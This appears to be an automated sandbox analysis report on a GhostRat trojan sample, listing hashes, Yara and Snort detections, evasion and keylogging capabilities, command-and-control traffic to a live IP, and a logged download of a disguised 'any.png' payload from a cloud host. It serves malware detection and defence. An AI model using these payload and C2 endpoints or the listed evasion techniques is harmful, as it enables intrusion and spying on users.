Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2IVWAPeiZm.exe

Overview

General Information

Sample name:2IVWAPeiZm.exe
renamed because original name is a hash value
Original sample name:06592a8ca068935d98a5ada152e3393d.exe
Analysis ID:1467970
MD5:06592a8ca068935d98a5ada152e3393d
SHA1:41adfa7ad17a0842b62b227b37ea4778fe7d247d
SHA256:acce6a3f4a8de7b556e74279744466adf4ec318a9fc03c639cdbc7f47c60da0d
Tags:64exetrojan
Infos:

Detection

GhostRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GhostRat
AI detected suspicious sample
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after accessing registry keys)
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2IVWAPeiZm.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\2IVWAPeiZm.exe" MD5: 06592A8CA068935D98A5ADA152E3393D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x11a6d8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\any[1].pngWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x10b0f0:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
C:\Users\Public\Pictures\any.pngWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x10b0f0:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
    00000000.00000002.4112489647.000001CFB9530000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
      00000000.00000003.2285778041.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
        00000000.00000003.2629266568.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
          00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
          • 0x119f5:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
          Click to see the 46 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.2IVWAPeiZm.exe.1cfba34ac51.7.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
            0.3.2IVWAPeiZm.exe.1cfba0ab6a1.11.raw.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
              0.3.2IVWAPeiZm.exe.1cfb925162d.2.raw.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                0.3.2IVWAPeiZm.exe.1cfba9111ed.14.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                  0.2.2IVWAPeiZm.exe.1cfba0e5bd1.4.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                    Click to see the 119 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Communication To Uncommon Destination Ports
                    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 206.238.115.146, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Users\user\Desktop\2IVWAPeiZm.exe, Initiated: true, ProcessId: 7272, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49740

                    Snort Signatures

                    Timestamp:07/05/24-07:33:08.224440
                    SID:2052875
                    Source Port:49731
                    Destination Port:6666
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/05/24-07:35:32.860010
                    SID:2052875
                    Source Port:49741
                    Destination Port:6666
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/05/24-07:36:35.724322
                    SID:2052875
                    Source Port:49744
                    Destination Port:8888
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/05/24-07:34:21.149333
                    SID:2052875
                    Source Port:49732
                    Destination Port:6666
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: 2IVWAPeiZm.exeAvira: detected
                    Multi AV Scanner detection for submitted file
                    Source: 2IVWAPeiZm.exeReversingLabs: Detection: 57%
                    Source: 2IVWAPeiZm.exeVirustotal: Detection: 59%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_4652869d-6
                    Source: unknownHTTPS traffic detected: 159.75.57.35:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: 2IVWAPeiZm.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\rgweq\Desktop\@7\ssp\x64\Release\ssp.pdb%% source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: C:\Users\rgweq\Desktop\@7\ssp\x64\Release\ssp.pdb source: 2IVWAPeiZm.exe, 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: .pdb7 source: 2IVWAPeiZm.exe
                    Source: Binary string: F:\SDKUPDATE\online_win\targets\win32\msc_lua\Release\msc.pdb source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmp
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: z:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: x:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: v:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: t:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: r:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: p:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: n:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: l:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: j:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: h:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: f:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: b:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: y:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: w:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: u:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: s:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: q:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: o:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: m:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: k:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: i:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: g:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: e:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile opened: [:Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96098C0 GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,lstrcpyW,lstrcpyW,lstrcatW,0_2_000001CFB96098C0

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2052875 ET TROJAN Anonymous RAT CnC Checkin 192.168.2.4:49731 -> 206.238.115.146:6666
                    Source: TrafficSnort IDS: 2052875 ET TROJAN Anonymous RAT CnC Checkin 192.168.2.4:49732 -> 206.238.115.146:6666
                    Source: TrafficSnort IDS: 2052875 ET TROJAN Anonymous RAT CnC Checkin 192.168.2.4:49741 -> 206.238.115.146:6666
                    Source: TrafficSnort IDS: 2052875 ET TROJAN Anonymous RAT CnC Checkin 192.168.2.4:49744 -> 206.238.115.146:8888
                    Source: global trafficTCP traffic: 192.168.2.4:49731 -> 206.238.115.146:6666
                    Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: unknownTCP traffic detected without corresponding DNS query: 206.238.115.146
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9603680 select,recv,_errno,_errno,_errno,0_2_000001CFB9603680
                    Source: global trafficHTTP traffic detected: GET /any.png HTTP/1.1User-Agent: WinINetDownloaderHost: pattern-1326658104.cos.ap-guangzhou.myqcloud.comCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: pattern-1326658104.cos.ap-guangzhou.myqcloud.com
                    Source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.wofficebox.com/
                    Source: 2IVWAPeiZm.exe, 00000000.00000002.4111407796.000001CFB747C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/
                    Source: 2IVWAPeiZm.exe, 2IVWAPeiZm.exe, 00000000.00000002.4111407796.000001CFB74CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/any.png
                    Source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/any.pngvector
                    Source: 2IVWAPeiZm.exe, 00000000.00000002.4111407796.000001CFB747C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/eX
                    Source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.innosetup.com/
                    Source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.remobjects.com/ps
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownHTTPS traffic detected: 159.75.57.35:443 -> 192.168.2.4:49730 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to capture and log keystrokes
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: [esc]0_2_000001CFB96111E0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96111E0 Sleep,GetTickCount,GetTickCount,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,GlobalUnlock,CloseClipboard,GetKeyState,lstrlenW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,0_2_000001CFB96111E0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96111E0 Sleep,GetTickCount,GetTickCount,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,GlobalUnlock,CloseClipboard,GetKeyState,lstrlenW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,0_2_000001CFB96111E0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB960DD20 GetDesktopWindow,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,GetDIBits,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,0_2_000001CFB960DD20
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9610DD0 SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,0_2_000001CFB9610DD0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000000.00000002.4111676483.000001CFB9200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\any[1].png, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: C:\Users\Public\Pictures\any.png, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9313495 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,0_2_000001CFB9313495
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB960D1D7 ExitProcess,ExitWindowsEx,0_2_000001CFB960D1D7
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB960D228 ExitWindowsEx,0_2_000001CFB960D228
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB960D207 ExitWindowsEx,0_2_000001CFB960D207
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96188E00_2_000001CFB96188E0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96033800_2_000001CFB9603380
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96075100_2_000001CFB9607510
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB960DD200_2_000001CFB960DD20
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96084400_2_000001CFB9608440
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96067B00_2_000001CFB96067B0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96107A00_2_000001CFB96107A0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96059500_2_000001CFB9605950
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96249A40_2_000001CFB96249A4
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96028500_2_000001CFB9602850
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96228640_2_000001CFB9622864
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB960E8D00_2_000001CFB960E8D0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96150CC0_2_000001CFB96150CC
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB961987C0_2_000001CFB961987C
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB961934C0_2_000001CFB961934C
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB960A3100_2_000001CFB960A310
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB960B3000_2_000001CFB960B300
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9603BD00_2_000001CFB9603BD0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96093C00_2_000001CFB96093C0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9612ABC0_2_000001CFB9612ABC
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9618D600_2_000001CFB9618D60
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB962154C0_2_000001CFB962154C
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9610DD00_2_000001CFB9610DD0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96095B00_2_000001CFB96095B0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9621DB00_2_000001CFB9621DB0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9615C800_2_000001CFB9615C80
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB961FC800_2_000001CFB961FC80
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB961B7340_2_000001CFB961B734
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96146F00_2_000001CFB96146F0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB960E6600_2_000001CFB960E660
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9617E340_2_000001CFB9617E34
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9608E200_2_000001CFB9608E20
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_00007FF6F60813000_2_00007FF6F6081300
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB93134950_2_000001CFB9313495
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9312C890_2_000001CFB9312C89
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9311DAD0_2_000001CFB9311DAD
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB93130650_2_000001CFB9313065
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9313F490_2_000001CFB9313F49
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB93968600_2_000001CFB9396860
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB93933900_2_000001CFB9393390
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB93973D00_2_000001CFB93973D0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB939E1C00_2_000001CFB939E1C0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB93A6C500_2_000001CFB93A6C50
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB93A48980_2_000001CFB93A4898
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB93928800_2_000001CFB9392880
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB939A30C0_2_000001CFB939A30C
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9396F700_2_000001CFB9396F70
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95BE1310_2_000001CFB95BE131
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95B88F10_2_000001CFB95B88F1
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95C41C10_2_000001CFB95C41C1
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95BADD10_2_000001CFB95BADD1
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95C258D0_2_000001CFB95C258D
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95C88310_2_000001CFB95C8831
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95BD7F10_2_000001CFB95BD7F1
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95B54210_2_000001CFB95B5421
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95B90810_2_000001CFB95B9081
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95C08A10_2_000001CFB95C08A1
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95B23210_2_000001CFB95B2321
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95C83B10_2_000001CFB95C83B1
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95B6FE10_2_000001CFB95B6FE1
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95B2E510_2_000001CFB95B2E51
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95CB2050_2_000001CFB95CB205
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95C8E1D0_2_000001CFB95C8E1D
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95B62810_2_000001CFB95B6281
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95C02710_2_000001CFB95C0271
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95B36A10_2_000001CFB95B36A1
                    Source: 2IVWAPeiZm.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: 2IVWAPeiZm.exe, 00000000.00000000.1655005973.00007FF6F7C50000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamessp.exe< vs 2IVWAPeiZm.exe
                    Source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs 2IVWAPeiZm.exe
                    Source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemsc.dll vs 2IVWAPeiZm.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: OriginalFilenamessp.exe< vs 2IVWAPeiZm.exe
                    Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
